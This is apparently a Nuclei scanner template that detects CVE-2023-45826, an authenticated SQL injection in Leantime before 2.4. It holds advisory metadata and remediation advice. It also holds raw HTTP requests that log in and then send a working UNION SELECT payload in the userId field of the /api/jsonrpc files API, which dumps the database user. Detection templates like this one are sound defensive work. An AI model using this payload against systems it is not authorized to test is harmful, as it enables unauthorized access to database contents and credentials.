id: CVE-2023-45826

info:
  name: Leantime < 2.4 - Authenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Authenticated attackers can exploit SQL injection through the userId parameter in the files API to dump database contents, potentially exposing project information, user credentials, and sensitive business data from the Leantime system.
  remediation: |
    Update Leantime to version 2.4-beta-4 or later that uses parameterized queries for the userId variable in app/domain/files/repositories/class.files.php.
  reference:
    - https://github.com/advisories/GHSA-c39w-3pjx-qc7m
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-45826
    cwe-id: CWE-89
    epss-score: 0.01856
    epss-percentile: 0.76429
    cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: leantime
    product: leantime
    shodan-query: title:"Leantime"
  tags: cve,cve2023,leantime,authenticated,sqli,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr}}"
  hex_marker: "{{hex_encode(marker)}}"

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        redirectUrl=http%253A%252F%252Fpdt.re%253A8080%252Fdashboard%252Fhome&username={{username}}&password={{password}}&login=Login

    matchers:
      - type: word
        part: body
        words:
          - /dashboard/home

  - raw:
      - |
        POST /api/jsonrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"method": "leantime.rpc.files.getFilesByModule","jsonrpc": "2.0","id": "1","params": {"userId":"9 union select concat(0x{{hex_marker}},0x3a,user()),2,3,4,5,6,7,8,9,10,11-- -" } }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request was successful'
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        internal: false
        regex:
          - '"\w+:(.*?)\"'
        group: 1
# digest: 4b0a004830460221008b33c0956c3034805d397fb16da74b9a47c870e2f871c721cf1fd2278b6d7fbe022100abfb1aa19eea46e974b819ff483ad4d6437b35dfb1900a05c65dd2df79137b05:922c64590222798bb761d5b6d8e72950